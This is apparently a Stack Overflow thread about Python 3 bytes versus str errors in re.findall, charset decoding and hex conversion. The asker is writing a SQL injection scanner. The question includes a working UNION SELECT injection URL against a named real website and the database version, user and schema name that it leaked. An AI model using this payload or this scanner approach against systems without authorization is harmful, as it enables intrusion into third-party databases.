re.findall() and unicode like error in python 3

Question

I'm using Python 3.3.0 on Windows 8. The code below runs successfully in Python 2.7.x:

import re, urllib
import urllib.request

arg_end = "--"
site = "http://www.johandemeij.com/post.php?id=276+AND+1=2+UNION+SELECT+1,2,p0w3R,4,p0w3R,p0w3R,7,8,p0w3R,p0w3R--"

url = site.replace("p0w3R","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end

requrl = urllib.request.Request(url)

response = urllib.request.urlopen(requrl)

source = response.read()

match = re.findall("\x1e\x1e\S+", str(source))

print("match>>>", match)

With this script, the match variable ends up empty! And when I use this instead:

match = re.findall("\x1e\x1e\S+", source)

it raises this error:

TypeError: can't use a string pattern on a bytes-like object

In fact, when I load the injected URL in the browser, the vulnerable column shows a result like this: 5.1.61-0+squeeze1johan@localhostjohan_db

So what's wrong with that regex, and what should I change, and where? When I looked for \x in the re module section of the Python docs, I found nothing, or maybe I failed to understand it. Please suggest something, with an example if possible, that is easy to understand.

One more thing: when I tried to convert 1e into a string, it gave nothing!

I have just started learning Python 3, and instead of writing simple programs I really want to create some useful scripts. So I'm trying my hand at a simple SQLi scanner in Python 3. I got the inspiration from the darkMySQLi tool.

jfs · Accepted Answer · 2012-10-26T23:00:59.863

By default ordinary string literals "" are bytestrings in Python 2, but they are Unicode strings in Python 3. b"" creates a bytestring in both versions.
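
A minimal sketch of that difference, using a made-up bytes value in place of response.read(). It suggests why the str(source) version in the question finds nothing: str() on a bytes object returns its repr, so each 0x1e byte is spelled out as the visible characters \x1e and the real control character is no longer there. The sample data and the character class [^\x1e\s] (used here instead of the question's \S+ so the match ends at the next separator in both bytes and str mode) are assumptions for illustration.

```python
import re

# Made-up stand-in for response.read(): bytes with 0x1e separators.
source = b"<td>\x1e\x1e5.1.61-0+squeeze1\x1ejohan@localhost\x1ejohan_db\x1e </td>"

# str(bytes) gives the repr "b'...'", where each 0x1e byte is spelled out as the
# characters backslash, x, 1, e. The real control character is gone, so no match.
no_match = re.findall("\x1e\x1e\\S+", str(source))
print(no_match)

# Option 1: stay in bytes and use a bytes pattern.
bytes_match = re.findall(rb"\x1e\x1e[^\x1e\s]+", source)
print(bytes_match)

# Option 2: decode to str first, then use a str pattern.
text = source.decode("utf-8")
str_match = re.findall(r"\x1e\x1e[^\x1e\s]+", text)
print(str_match)
```

Either option works as long as the pattern and the searched object are the same type; mixing a str pattern with bytes is what raises the TypeError quoted in the question.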

Read about the difference between bytes and strings (Unicode) in Python.

You could use urllib.parse.urlencode({'id': '276 AND ...'}) to construct the URL query, and decode the source bytes to Unicode with source.decode(encoding). How to find the character encoding depends on the content type. For example, if the Content-Type HTTP header has a charset parameter:

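import cgi  # note: deprecated in Python 3.11 and removed in 3.13

# extract the encoding from Content-Type and print the decoded response
_, params = cgi.parse_header(response.headers.get('Content-Type', ''))
encoding = params.get('charset', 'utf-8')  # assumed fallback when no charset is given
print(response.read().decode(encoding))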
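
As a rough sketch of both suggestions without touching the network: urlencode() builds the query string, and the headers object's own get_content_charset() method reads the charset without the cgi module. The example.com URL, the parameter names, the decode_body helper, and the UTF-8 fallback are all hypothetical choices made for illustration; a plain email.message.Message stands in for response.headers, which is a subclass of it.

```python
from email.message import Message
from urllib.parse import urlencode

# urlencode() escapes each value and joins the pairs with "&".
# The parameter names and values here are placeholders.
query = urlencode({"id": 276, "q": "two words"})
url = "http://example.com/post.php?" + query
print(url)


def decode_body(body, headers, fallback="utf-8"):
    """Decode bytes with the Content-Type charset, else a fallback (an assumption)."""
    charset = headers.get_content_charset() or fallback
    try:
        return body.decode(charset)
    except (LookupError, UnicodeDecodeError):
        # Unknown or wrong charset label: decode leniently rather than crash.
        return body.decode(fallback, errors="replace")


# Stand-in for response.headers.
headers = Message()
headers["Content-Type"] = "text/html; charset=ISO-8859-1"
print(decode_body(b"caf\xe9", headers))
```

With a real response the call would be decode_body(response.read(), response.headers). When the server sends no charset at all, the fallback is only a guess.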

edited Oct 26 '12 at 23:00

answered Oct 25 '12 at 21:38

jfs


Thanks for the reply, and sorry for being late; I was trying to understand what you told me. When I made this change: `source = response.read().decode('utf-8')` I got something like this in the match variable: `['\x1e\x1e5.1.61-0+squeeze1', '\x1e\x1e5.1.61-0+squeeze1', '\x1e\x1e5.1.61-0+squeeze1']` But this is not what I expected! Why does it fail to get the full content? And yes, I'm still confused about bytes and strings, so can you please elaborate on this? And would you please show me an example of urllib.parse.urlencode()? I have already read the Python docs but still have no idea! – magneto Oct 25 '12 at 22:32
@magneto: I've updated the answer. The result `['\x1e\x1e5.1.61-0+squeeze1', ...]` makes sense considering your code `re.findall("\x1e\x1e\S+", source.decode())`. What do you expect instead? Add it to your question. – jfs Oct 25 '12 at 22:55
Hey, I got the point and also got the correct result: `['\x1e5.1.61-0+squeeze1', '\x1ejohan@localhost', '\x1ejohan_db', ...]` But now the question is that it's a list, and I want only the first 3 things from it. So how do I get only `5.1.61-0+squeeze1`, `johan@localhost`, `johan_db`? I tried the `.split("\x1e")` method several ways but failed. :( Any idea on this? – magneto Oct 25 '12 at 23:08
It seems that you misunderstood me. Now I get `['5.1.61-0+squeeze1', 'johan@localhost', 'johan_db', ...]` OK, that looks nice. But what about splitting that list? I want to print the first 3 elements individually in my script. To make my point crystal clear, I want to print: `Version = 5.1.61-0+squeeze1` `User = johan@localhost` `Database = johan_db` – magneto Oct 25 '12 at 23:23
@magneto: the result is already a list. If you don't know how to enumerate individual items in a list, [read the tutorial](http://docs.python.org/py3k/tutorial/datastructures.html). – jfs Oct 25 '12 at 23:29
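
One possible way to print the three values individually, as a sketch only. The text value is a made-up decoded fragment built from the values quoted in the question, and the labels list is an assumption about the order in which the fields arrive.

```python
# Hypothetical decoded page fragment, using the values quoted in the question.
text = "\x1e\x1e5.1.61-0+squeeze1\x1ejohan@localhost\x1ejohan_db\x1e "

# Split on the 0x1e separator and drop empty or whitespace-only pieces.
fields = [part for part in text.split("\x1e") if part.strip()]

# Pair each value with a label; the order is assumed to match the injected concat().
labels = ["Version", "User", "Database"]
for label, value in zip(labels, fields):
    print(label, "=", value)
```

Indexing the list directly (fields[0], fields[1], fields[2]) gives the same values; zip() just avoids repeating the print call.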
Oops, it seems I'm being a n00b. I could have just indexed the list, like `match[0]`, `match[1]`, etc., to print the values. Yup, I got it! Can I trouble you some more? What about this issue in Python 3: `LookupError: unknown encoding: hex` – magneto Oct 25 '12 at 23:36
@magneto: [Decode Hex String in Python 3](http://stackoverflow.com/q/3283984/4279) – jfs Oct 25 '12 at 23:54
Hey, but it's not working! When I tried `s = "nothing"` `bytes.fromhex(s).decode('utf-8')` it gave me this error: `ValueError: non-hexadecimal number found in fromhex() arg at position 0` So what's the solution now? – magneto Oct 26 '12 at 00:08
@magneto: it is a very basic question. Have you tried reading the docs for the bytes.fromhex() function? You could [ask it as a separate question](http://stackoverflow.com/questions/ask) so that Google can help the next person after you, though it has probably already been answered multiple times. – jfs Oct 26 '12 at 00:40
Hmm, I know it's very basic. I tried to read the Python docs, but they suck! Anyway, I want to encode my string into hex; Python 2 has the ready-made .encode("hex") for this. Let me compile my research on this and I will ask a question. – magneto Oct 26 '12 at 09:35
Hey, one more doubt! I found that `source = response.read().decode('utf-8')` does not work when the website uses `iso-8859-1` or any other `charset`. So how do I deal with multiple charsets? Please don't tell me to change it manually in the source, or to read the Python docs, because I find them really confusing! I believe it is best to learn from experienced people instead. – magneto Oct 26 '12 at 13:22
@magneto: To convert to/from hex (bytes) you could use the base64.b16encode/.b16decode functions. Determining the character encoding is complicated in the general case if the Content-Type HTTP header has no `charset` parameter. You could use an HTTP client library that tries to guess it automatically, such as [requests](http://docs.python-requests.org/en/latest/). If the Python docs are too hard for you to understand, start with a simpler book such as http://learnpythonthehardway.org/ – jfs Oct 26 '12 at 22:54
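
A small sketch of the hex round trip with those functions, plus binascii.hexlify for lowercase digits. It also hints at why bytes.fromhex("nothing") raised ValueError earlier in the thread: fromhex() decodes a string of hex digits, it does not encode arbitrary text. The variable names are illustrative only.

```python
import base64
import binascii

text = "nothing"

# Text -> hex: encode the str to bytes first, then hex-encode the bytes.
raw = text.encode("utf-8")
upper_hex = base64.b16encode(raw)   # uppercase hex digits, as bytes
lower_hex = binascii.hexlify(raw)   # the same digits in lowercase
print(upper_hex, lower_hex)

# Hex -> text: reverse both steps.
from_upper = base64.b16decode(upper_hex).decode("utf-8")
from_lower = bytes.fromhex(lower_hex.decode("ascii")).decode("utf-8")
print(from_upper, from_lower)
```

On Python 3.5 and later, raw.hex() is a shorter route to the lowercase form; it is not available on the 3.3 release mentioned in the question.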
@Sebastian: Now I think you have understood my question. So, again, is there any way to fetch or identify the charset of a given website? I have to decode with the correct charset in my script; only then will I get the contents with re.findall(). Without identifying the correct charset, I get no value in my match variable. I hope you can understand me and feel that it's an appropriate question! And I have so many doubts! Can I have your email address, please? I think this is not the appropriate place to talk more. – magneto Oct 27 '12 at 14:22
@magneto: 1. Reread my last comment and look at the answer. 2. Your initial error was a TypeError. If that is no longer the case, you should [reflect it in your question](http://stackoverflow.com/posts/13076374/edit) or ask a new one (limit the scope of your question). A comment is not the appropriate place to put new info about your question. – jfs Oct 27 '12 at 17:54
Hmm, yup, okay. I will ask a new question after doing more in-depth research. Anyway, I did clearly mention "re.findall and unicode like error". – magneto Oct 27 '12 at 20:10
